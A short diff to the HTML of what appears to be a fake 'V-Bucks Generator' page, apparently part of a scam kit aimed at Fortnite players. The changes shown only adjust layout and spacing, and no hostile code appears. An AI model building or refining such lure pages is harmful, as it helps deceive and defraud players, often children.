--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -53,11 +53,10 @@
                                 
                                 <div class="username-connected text-center" id="post_login" style="display: none;">
                                     <p class="conn">Connected</p>  
+                                    <span id="user-text"></span> has been linked to the V-Bucks Generator.
+
                                     <p>
-                                        <span id="user-text"></span> has been linked to the V-Bucks Generator.
-                                        <div class="col-lg-12" style="margin-top: 20px;">
-                                            <a onclick="proceed()" href="index.html#" class="proceed">Proceed</a>
-                                        </div>
+                                        <a onclick="proceed()" href="index.html#" class="proceed">Proceed</a>
                                     </p>
                                 </div>
 
@@ -130,7 +129,7 @@
                                 
                                 <div class="col-lg-12 sticky-alert" id="live_activity">
                                     <div class="col-lg-12 sticky-alert">
-                                        <p style="font-family: fortnite; font-size: 25px; margin-bottom: 12px; margin-top: 12px">
+                                        <p style="font-family: fortnite; font-size: 25px; margin-bottom: 12px">
                                             LIVE ACTIVITY
                                         </p>
                                         <div id="fortnite-sticky" class="fortnite-sticky"></div>
